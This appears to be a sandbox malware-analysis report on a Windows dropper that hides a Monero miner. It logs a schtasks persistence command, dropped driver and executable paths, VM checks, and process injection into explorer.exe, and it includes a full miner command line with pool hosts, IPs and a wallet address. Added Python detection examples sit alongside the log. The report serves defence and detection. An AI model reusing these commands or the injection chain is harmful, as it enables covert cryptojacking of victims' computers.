              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Local\Temp\services64.exe
              Source: WR64.sys.9.dr | Binary string: \Device\WinRing0_1_2_0
              Source: classification engine | Classification label: mal100.evad.mine.winEXE@26/6@2/1
              Source: C:\Windows\System32\conhost.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\conhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: pcNCraWcRk | Joe Sandbox Cloud Basic: Detection: clean Score: 0
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\conhost.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: pcNCraWcRk.exe | Static file information: File size 2234368 > 1048576
              Source: pcNCraWcRk.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00623B00 push rax; retf
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00623BFF push rax; iretd
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_006238C0 push rax; retn 0009h
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00623AB7 push rax; retf 0009h
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EDE0000 push es; iretd
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E0E0000 push es; iretd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00409B00 push rax; retf
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_004098C0 push rax; retn 0009h
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00409BFF push rax; iretd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00409AB7 push rax; retf 0009h
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A780EE0000 push es; iretd

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys (dropped file)
Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Local\Temp\services64.exe (dropped file)
Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe (dropped file)
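A file-system sweep for the three drops listed above, added here as a worked example; it is not Joe Sandbox code and not part of the report. The dropped paths and the WinRing0.pdb string come from this report. Two points the sweep encodes: the PDB path identifies the OpenLibSys WinRing0 driver that XMRig bundles for MSR access (the `--randomx-no-rdmsr` option in the miner command line below is the matching RandomX MSR switch), and that driver normally carries its own code signature, so "is the .sys signed?" alone does not flag it; what is anomalous is a driver image sitting under a user profile. The scan root and the fixture files are constructed for the demonstration.

```python
"""Sweep a user profile for the artefacts this report attributes to the dropper.

Added example for this report, not Joe Sandbox code. Dropped paths and the
WinRing0 PDB string are the report's; the scan root and fixture files are
constructed here so the sweep runs offline.
"""
import os
import tempfile

# Dropped-file paths from the report, relative to the user profile.
DROPPED = {
    r"appdata\roaming\microsoft\libs\wr64.sys",
    r"appdata\roaming\microsoft\libs\sihost64.exe",
    r"appdata\local\temp\services64.exe",
}
# Tail of the PDB path found in WR64.sys (d:\hotproject\winring0\...\WinRing0.pdb).
WINRING0_PDB = b"winring0\\source\\dll\\sys\\lib\\amd64\\winring0.pdb"
PE_MAGIC = b"MZ"


def classify_file(rel_path, head):
    """Return the reasons a file under a user profile is suspicious (empty if none).

    rel_path is relative to the profile root; head is the first bytes of the file.
    """
    reasons = []
    norm = rel_path.replace("/", "\\").lower()
    is_pe = head.startswith(PE_MAGIC)
    if norm in DROPPED:
        reasons.append("path matches dropped file from report")
    if is_pe and norm.endswith(".sys"):
        # Drivers belong under System32\drivers; a PE .sys under a profile is a drop.
        reasons.append("driver image stored under a user profile")
    if WINRING0_PDB in head.lower():
        reasons.append("WinRing0 PDB path present")
    if is_pe and "\\temp\\" in norm:
        reasons.append("PE image in Temp")
    return reasons


def sweep(profile_root, head_bytes=4 * 1024 * 1024):
    """Walk a profile and map relative path -> reasons for every flagged file."""
    findings = {}
    for dirpath, _, names in os.walk(profile_root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, profile_root).replace("/", "\\")
            with open(full, "rb") as fh:
                head = fh.read(head_bytes)
            reasons = classify_file(rel, head)
            if reasons:
                findings[rel] = reasons
    return findings


def build_fixture(root):
    """Constructed stand-ins for the drops (not the real samples): MZ header plus filler."""
    files = {
        r"AppData\Roaming\Microsoft\Libs\WR64.sys":
            PE_MAGIC + b"\0" * 64 + b"d:\\hotproject\\winring0\\source\\dll\\sys\\lib\\amd64\\WinRing0.pdb",
        r"AppData\Roaming\Microsoft\Libs\sihost64.exe": PE_MAGIC + b"\0" * 32,
        r"AppData\Local\Temp\services64.exe": PE_MAGIC + b"\0" * 32,
        r"AppData\Local\Temp\setup.exe": PE_MAGIC + b"\0" * 32,   # PE in Temp, not in the report
        r"Documents\notes.txt": b"benign text",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("\\"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the constructed profile in a temp directory, sweep it, return findings."""
    root = tempfile.mkdtemp(prefix="profile_")
    build_fixture(root)
    return sweep(root)


if __name__ == "__main__":
    for rel, why in sorted(demo().items()):
        print(rel, "->", "; ".join(why))
```

Run `demo()` to see the constructed profile flagged; against a live host, call `sweep(r"C:\Users\<name>")` and review anything with more than one reason first.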

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX (106 occurrences)
Source: C:\Windows\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 occurrences)

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\conhost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe | Thread delayed: delay time: 922337203685477 (6 occurrences; 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds in .NET, so these are indefinite waits by the .NET code hosted in conhost.exe rather than timed sandbox-evasion sleeps)
Source: C:\Windows\System32\conhost.exe | Thread delayed: delay time: 35000
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe | Domain query: xmr.givemexyz.in
Writes to foreign memory regions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Memory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Memory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 886010
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Memory written: C:\Windows\System32\conhost.exe base: 2A780EE0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Memory written: C:\Windows\System32\conhost.exe base: 16CC3390000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: DB8010
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6764 base: 886010 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe | Memory written: PID: 6784 base: DB8010 value: 00
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 6764
Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 6784
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 80EE0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Thread created: C:\Windows\System32\conhost.exe EIP: C3390000
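The injection entries above describe two different chains: the droppers allocate an RWX region in a fresh conhost.exe, write to it and start a thread there, while the hollowed conhost.exe writes a whole PE (value starts with 4D5A, i.e. "MZ") at 0x140000000, the linker's default x64 image base, into explorer.exe and then sets a thread context. The example below, added here and not Joe Sandbox code, correlates such per-event records into those two verdicts. Its records are constructed from the values the report prints; one caveat it has to handle is that the "EIP" the report shows is only the low 32 bits of the start address (base 25F5EDE0000 appears as EIP 5EDE0000), so the thread start is matched on those bits. The record layout and the technique labels are this example's own assumptions.

```python
"""Correlate cross-process memory events into injection verdicts.

Added example for this report, not Joe Sandbox code. Event values (bases, PIDs,
first bytes) are taken from the report; the record layout, the conhost instance
labels and the verdict strings are assumptions made for the demonstration.
"""
from dataclasses import dataclass, field

PAGE = 0x1000
LOW32 = 0xFFFFFFFF
RWX = "page execute and read and write"
DEFAULT_X64_IMAGE_BASE = 0x140000000      # linker default for x64 executables


@dataclass
class Pair:
    """Everything one source process did to one target process."""
    source: str
    target: str
    rwx_regions: list = field(default_factory=list)
    techniques: set = field(default_factory=set)


def correlate(events):
    """Group events by (source, target) and tag the technique each implies."""
    pairs = {}
    for e in events:
        if e["source"] == e["target"]:
            continue                          # self-modification is out of scope here
        key = (e["source"], e["target"])
        p = pairs.setdefault(key, Pair(*key))
        kind = e["kind"]
        if kind == "alloc" and e["protect"] == RWX:
            p.rwx_regions.append(e["base"])
            p.techniques.add("rwx_alloc")
        elif kind == "write":
            p.techniques.add("foreign_write")
            if e["base"] % PAGE == 0 and e["data"].startswith(b"MZ"):
                p.techniques.add("pe_header_write")
            if e["base"] == DEFAULT_X64_IMAGE_BASE:
                p.techniques.add("write_at_default_image_base")
        elif kind == "set_context":
            p.techniques.add("thread_context_modified")
        elif kind == "create_thread":
            # The sandbox prints only the low 32 bits of the thread start address,
            # so match it against the allocated regions on those bits.
            hits = [r for r in p.rwx_regions if (r & LOW32) == (e["start"] & LOW32)]
            p.techniques.add("remote_thread_in_rwx_region" if hits else "remote_thread")
    return pairs


def verdict(p):
    """Turn a Pair's technique set into a one-line verdict."""
    t = p.techniques
    if {"pe_header_write", "thread_context_modified"} <= t:
        return "PE image mapped into target and thread redirected (hollowing-style)"
    if {"rwx_alloc", "foreign_write", "remote_thread_in_rwx_region"} <= t:
        return "code written to RWX region and executed via remote thread"
    if "foreign_write" in t:
        return "cross-process write without observed execution"
    return "no injection indicators"


def summarize(events):
    return {f"{s} -> {d}": verdict(p) for (s, d), p in correlate(events).items()}


# Constructed from the report: conhost instance labels are assumptions; the two
# bytes written into conhost (06 CF) are the "push es; iretd" the report disassembles
# at that base, and 4D 5A / 48 are the values it prints for the explorer.exe writes.
EVENTS = [
    {"kind": "alloc", "source": "pcNCraWcRk.exe", "target": "conhost.exe (1)", "base": 0x25F5EDE0000, "protect": RWX},
    {"kind": "write", "source": "pcNCraWcRk.exe", "target": "conhost.exe (1)", "base": 0x25F5EDE0000, "data": b"\x06\xcf"},
    {"kind": "create_thread", "source": "pcNCraWcRk.exe", "target": "conhost.exe (1)", "start": 0x5EDE0000},
    {"kind": "alloc", "source": "services64.exe", "target": "conhost.exe (9)", "base": 0x2C94E0E0000, "protect": RWX},
    {"kind": "write", "source": "services64.exe", "target": "conhost.exe (9)", "base": 0x2C94E0E0000, "data": b"\x06\xcf"},
    {"kind": "create_thread", "source": "services64.exe", "target": "conhost.exe (9)", "start": 0x4E0E0000},
    {"kind": "write", "source": "conhost.exe", "target": "explorer.exe (6764)", "base": 0x140000000, "data": b"MZ"},
    {"kind": "write", "source": "conhost.exe", "target": "explorer.exe (6764)", "base": 0x140001000, "data": b"\x48"},
    {"kind": "write", "source": "conhost.exe", "target": "explorer.exe (6764)", "base": 0x886010, "data": b"\x00"},
    {"kind": "set_context", "source": "conhost.exe", "target": "explorer.exe (6764)"},
    {"kind": "write", "source": "conhost.exe", "target": "explorer.exe (6784)", "base": 0x140000000, "data": b"MZ"},
    {"kind": "write", "source": "conhost.exe", "target": "explorer.exe (6784)", "base": 0xDB8010, "data": b"\x00"},
    {"kind": "set_context", "source": "conhost.exe", "target": "explorer.exe (6784)"},
]

if __name__ == "__main__":
    for pair, v in summarize(EVENTS).items():
        print(f"{pair}: {v}")
```

Note that no allocation event is recorded for the explorer.exe targets: the PE is written straight over the 0x140000000 range, which is why the hollowing verdict keys on the MZ write plus the context change rather than on an RWX allocation.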
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 (4 occurrences)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp | Binary or memory strings: Program Manager, Shell_TrayWnd, Progman, Progmanlock
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
